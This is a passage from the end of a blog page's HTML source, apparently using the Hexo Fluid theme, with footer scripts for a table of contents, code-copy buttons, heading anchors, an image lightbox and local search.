      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
